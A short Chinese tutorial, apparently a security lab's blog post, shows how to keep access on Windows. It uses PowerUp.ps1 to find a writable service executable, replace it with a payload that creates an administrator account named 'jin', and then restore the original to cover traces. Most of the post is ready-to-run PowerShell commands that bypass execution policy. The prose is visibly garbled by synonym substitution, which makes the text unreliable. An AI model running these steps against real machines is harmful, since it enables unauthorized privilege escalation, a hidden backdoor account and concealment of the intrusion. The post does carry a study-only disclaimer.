新闻动态

?+
+
windows利用常见法式进行权限维持
道理:利用PowerUp.ps1天生一个能够执行我们机关的恶意号令的同名可执行法式并代替正本的可执行法式。主法式执行时挪用同名可执行法式来执行我们机关的恶意号令。
查找拥有可写的可执行文件:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

查见解式对用户的权限:icacls "D:\tools\KGMusic\9.1.44.23567\service.exe"

利用可执行文件提权,向可写法式中写入创建用户的payload:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-ServiceEXE -ServiceName KugouService -Username jin -Password jin -Verbose}"

期待服务沉启或对应法式再次运行:
能够看到此时新建了一个治理员权限的用户jin

算帐痕迹:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Restore-ServiceEXE -ServiceName KugouService}"

E·N·D
本文由mg不朽情缘创安尝试室编纂。
本文仅限于幼我进建和技术钻研,由于传布、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者自己掌管,本单元不为此承担任何责任。创安攻防尝试室占有对此文章的批改和诠释权,如欲转载或传布此文章,必须保障此文章的齐全性,蕴含版权申明等全数内容。
如有侵权,请联系后盾。
●
创安尝试室
mg不朽情缘创安尝试室,是mg不朽情缘旗下的技术钻研团队,成立于2021年9月,重要钻研红蓝匹涤注沉大安全保险、应急响应等方向。
创安攻防尝试室圆满实现了屡次公安进行的沉要网络安全保险和攻防演习活动,并积极参与各类网络安全较量,屡获殊荣。
创安攻防尝试室秉承mg不朽情缘的发展理想,致力打造国内一流网络安全团队。
